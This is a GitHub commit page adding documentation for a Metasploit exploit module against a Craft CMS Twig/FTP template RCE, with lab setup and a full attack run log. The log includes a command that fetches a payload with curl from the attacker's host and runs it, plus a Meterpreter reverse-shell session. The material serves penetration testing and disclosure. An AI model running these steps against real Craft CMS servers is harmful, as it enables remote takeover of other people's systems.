Skip to content

Commit 34f3957

Browse files
msutovsky-r7msutovsky-r7
committed
Land #19772, adding module for CraftCMS FTP template exploit
2 parents 1939257 + 2254a1f commit 34f3957

File tree

2 files changed

+496
-0
lines changed

2 files changed

+496
-0
lines changed

documentation/modules/exploit/linux/http/craftcms_ftp_template.md

Lines changed: 275 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,275 @@
1+
## Vulnerable Application
2+
3+
This Metasploit module exploits a Remote Code Execution vulnerability in **Craft CMS**.
4+
5+
The vulnerability lies in improper handling of Twig templates, which can be exploited
6+
to inject and execute arbitrary PHP code on the server via crafted HTTP requests.
7+
8+
---
9+
10+
### Affected Versions
11+
12+
- **5.x Series**: `>= 5.0.0-RC1`, `< 5.5.2`
13+
- **4.x Series**: `>= 4.0.0-RC1`, `< 4.13.2`
14+
- **3.x Series**: `>= 3.0.0`, `< 3.9.14`
15+
16+
---
17+
18+
### Setting Up a Vulnerable Lab
19+
20+
To test this exploit, follow these steps to set up a vulnerable Craft CMS environment.
21+
22+
#### Docker Setup
23+
24+
Install a specific vulnerable version of Craft CMS:
25+
26+
```bash
27+
mkdir exploit-craft && \
28+
cd exploit-craft && \
29+
# Configure DDEV (https://ddev.com/) project for Craft CMS \
30+
ddev config \
31+
--project-type=craftcms \
32+
--docroot=web \
33+
--create-docroot \
34+
--php-version="8.2" \
35+
--database="mysql:8.0" \
36+
--nodejs-version="20" && \
37+
# Create the DDEV project
38+
ddev start -y && \
39+
# Create Craft CMS with the specified version
40+
ddev composer create -y --no-scripts --no-interaction "craftcms/craft:5.0.0" && \
41+
# Install a vulnerable Craft CMS version
42+
ddev composer require "craftcms/cms:5.5.0" \
43+
--no-scripts \
44+
--no-interaction --with-all-dependencies && \
45+
# Set the security key for Craft CMS
46+
ddev craft setup/security-key && \
47+
# Install Craft CMS
48+
ddev craft install/craft \
49+
--username=admin \
50+
--password=password123 \
51+
[email protected] \
52+
--site-name=Testsite \
53+
--language=en \
54+
--site-url='$DDEV_PRIMARY_URL' && \
55+
# Enable register_argc_argv for PHP
56+
mkdir -p .ddev/php/ && \
57+
echo "register_argc_argv = On" > .ddev/php/php.ini && \
58+
ddev restart && \
59+
# Launch the project
60+
echo 'Setup complete. Launching the project.' && \
61+
ddev launch
62+
```
63+
64+
---
65+
66+
## Verification Steps
67+
68+
1. Start the vulnerable Craft CMS instance using the steps above.
69+
2. Launch `msfconsole`.
70+
3. Use the module: `use exploit/linux/http/craftcms_ftp_template`.
71+
4. Set `RHOSTS` to the target Craft CMS instance.
72+
5. Configure additional options (`TARGETURI`, `SSL`, etc.) as needed.
73+
6. Execute the exploit with the `run` command.
74+
7. If successful, the module will execute the payload on the target.
75+
76+
---
77+
78+
## Options
79+
No option
80+
81+
## Scenarios
82+
83+
#### Successful Exploitation Against Craft CMS 5.5.0
84+
85+
**Setup**:
86+
87+
- Local Craft CMS instance with a vulnerable version (e.g., `5.5.0`).
88+
- Metasploit Framework.
89+
90+
**Steps**:
91+
92+
To successfully exploit the Craft CMS vulnerability using this Metasploit module, follow these steps:
93+
94+
1. Start `msfconsole`:
95+
```bash
96+
msfconsole
97+
```
98+
99+
2. Load the module:
100+
```bash
101+
use exploit/linux/http/craftcms_ftp_template
102+
```
103+
104+
3. Set the `RHOSTS` option to the target Craft CMS instance, for example:
105+
```bash
106+
set RHOSTS exploit-craft.ddev.site
107+
```
108+
109+
4. Configure other necessary options such as `TARGETURI`, `SSL`, and `RPORT` if required. By default:
110+
- `RPORT` is set to `80`.
111+
- `TARGETURI` is set to `/`.
112+
113+
5. Set the payload for exploitation. For example:
114+
```bash
115+
set PAYLOAD cmd/linux/http/x64/meterpreter/reverse_tcp
116+
```
117+
118+
6. Set the local listener address and port:
119+
```bash
120+
set LHOST 192.168.1.36
121+
set LPORT 4444
122+
```
123+
124+
7. Optionally, customize FTP-related settings like `SRVPORT` and `FETCH_URIPATH` if needed:
125+
```bash
126+
set SRVPORT 9090
127+
set FETCH_SRVPORT 8081
128+
set FETCH_URIPATH /custom_payload_path
129+
```
130+
131+
8. Run the exploit:
132+
```bash
133+
exploit
134+
```
135+
136+
**Expected Results**:
137+
138+
If the target is vulnerable, the module will successfully execute the payload and open a session, such as a Meterpreter shell:
139+
140+
```bash
141+
msf6 exploit(linux/http/craftcms_ftp_template) > options
142+
143+
Module options (exploit/linux/http/craftcms_ftp_template):
144+
145+
Name Current Setting Required Description
146+
---- --------------- -------- -----------
147+
PASVPORT 0 no The local PASV data port to listen on (0 is random)
148+
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
149+
RHOSTS exploit-craft.ddev.site yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metaspl
150+
oit.html
151+
RPORT 80 yes The target port (TCP)
152+
SRVHOST 192.168.1.36 yes The local host or network interface to listen on. This must be an address on the local machine
153+
or 0.0.0.0 to listen on all addresses.
154+
SRVPORT 9090 yes The local port to listen on.
155+
SSL false no Negotiate SSL for incoming connections
156+
SSLCert no Path to a custom SSL certificate (default is randomly generated)
157+
VHOST no HTTP server virtual host
158+
159+
160+
Payload options (cmd/linux/http/x64/meterpreter/reverse_tcp):
161+
162+
Name Current Setting Required Description
163+
---- --------------- -------- -----------
164+
FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET)
165+
FETCH_DELETE false yes Attempt to delete the binary after execution
166+
FETCH_FILENAME QnXFYebbb no Name to use on remote system when storing payload; cannot contain spaces or slashes
167+
FETCH_SRVHOST no Local IP to use for serving payload
168+
FETCH_SRVPORT 8081 yes Local port to use for serving payload
169+
FETCH_URIPATH no Local URI to use for serving payload
170+
FETCH_WRITABLE_DIR yes Remote writable dir to store payload; cannot contain spaces
171+
LHOST 192.168.1.36 yes The listen address (an interface may be specified)
172+
LPORT 4444 yes The listen port
173+
174+
175+
Exploit target:
176+
177+
Id Name
178+
-- ----
179+
0 Unix/Linux Command Shell
180+
181+
182+
183+
View the full module info with the info, or info -d command.
184+
185+
msf6 exploit(linux/http/craftcms_ftp_template) > exploit
186+
[*] Command to run on remote host: curl -so ./jlVAsfWu http://192.168.1.36:8081/LoPlnjEpeOexZNVppn6cAA;chmod +x ./jlVAsfWu;./jlVAsfWu&
187+
[*] Exploit running as background job 57.
188+
[*] Exploit completed, but no session was created.
189+
msf6 exploit(linux/http/craftcms_ftp_template) >
190+
[*] Fetch handler listening on 192.168.1.36:8081
191+
[*] HTTP server started
192+
[*] Adding resource /LoPlnjEpeOexZNVppn6cAA
193+
[*] Started reverse TCP handler on 192.168.1.36:4444
194+
[*] Running automatic check ("set AutoCheck false" to disable)
195+
[*] Performing vulnerability check...
196+
[+] The target is vulnerable.
197+
[*] Starting FTP service...
198+
[*] Started service listener on 192.168.1.36:9090
199+
[*] FTP server started on 192.168.1.36:9090
200+
[*] Sending HTTP request to trigger the payload...
201+
[*] Triggering HTTP request...
202+
[*] -> 220 FTP Server Ready
203+
[*] on_client_command_user
204+
[*] -> 331 Username ok, send password.
205+
[*] on_client_command_pass
206+
[*] -> 230 Login successful.
207+
[*] on_client_command_cwd
208+
[*] -> 250 "/default" is current directory.
209+
[*] on_client_command_type
210+
[*] -> 200 Type set to: Binary.
211+
[*] on_client_command_size
212+
[*] -> 550 /default is not retrievable.
213+
[*] on_client_command_mdtm
214+
[*] -> 550 /default is not retrievable.
215+
[*] -> 220 FTP Server Ready
216+
[*] on_client_command_user
217+
[*] -> 331 Username ok, send password.
218+
[*] on_client_command_pass
219+
[*] -> 230 Login successful.
220+
[*] on_client_command_cwd
221+
[*] -> 550 Not a directory
222+
[*] on_client_command_type
223+
[*] -> 200 Type set to: Binary.
224+
[*] on_client_command_size
225+
[*] -> 213 154
226+
[*] on_client_command_mdtm
227+
[*] -> 213 20250110170738
228+
[*] -> 220 FTP Server Ready
229+
[*] on_client_command_user
230+
[*] -> 331 Username ok, send password.
231+
[*] on_client_command_pass
232+
[*] -> 230 Login successful.
233+
[*] on_client_command_cwd
234+
[*] -> 550 Not a directory
235+
[*] on_client_command_type
236+
[*] -> 200 Type set to: Binary.
237+
[*] on_client_command_size
238+
[*] -> 213 154
239+
[*] on_client_command_mdtm
240+
[*] -> 213 20250110170738
241+
[*] -> 220 FTP Server Ready
242+
[*] on_client_command_user
243+
[*] -> 331 Username ok, send password.
244+
[*] on_client_command_pass
245+
[*] -> 230 Login successful.
246+
[*] on_client_command_type
247+
[*] -> 200 Type set to: Binary.
248+
[*] on_client_command_size
249+
[*] -> 213 154
250+
[*] on_client_command_epsv
251+
[*] -> 502 EPSV command not implemented.
252+
[*] on_client_command_retr
253+
[*] -> 150 Opening data connection for /default/index.twig
254+
[*] -> 226 Transfer complete.
255+
[*] on_client_command_quit
256+
[*] -> 221 Goodbye.
257+
[*] Client 172.26.0.2 requested /LoPlnjEpeOexZNVppn6cAA
258+
[*] Sending payload to 172.26.0.2 (curl/7.88.1)
259+
[*] Transmitting intermediate stager...(126 bytes)
260+
[*] Sending stage (3045380 bytes) to 172.26.0.2
261+
[*] Meterpreter session 14 opened (192.168.1.36:4444 -> 172.26.0.2:59546) at 2025-01-10 17:07:39 +0100
262+
263+
msf6 exploit(linux/http/craftcms_ftp_template) > sessions 14
264+
[*] Starting interaction with 14...
265+
meterpreter > sysinfo
266+
Computer : 172.26.0.2
267+
OS : Debian 12.8 (Linux 5.15.0-130-generic)
268+
Architecture : x64
269+
BuildTuple : x86_64-linux-musl
270+
Meterpreter : x64/linux
271+
meterpreter >
272+
[*] Waiting for FTP client connections...
273+
[*] Shutting down FTP service...
274+
[*] Server stopped.
275+
```

0 commit comments

Comments
 (0)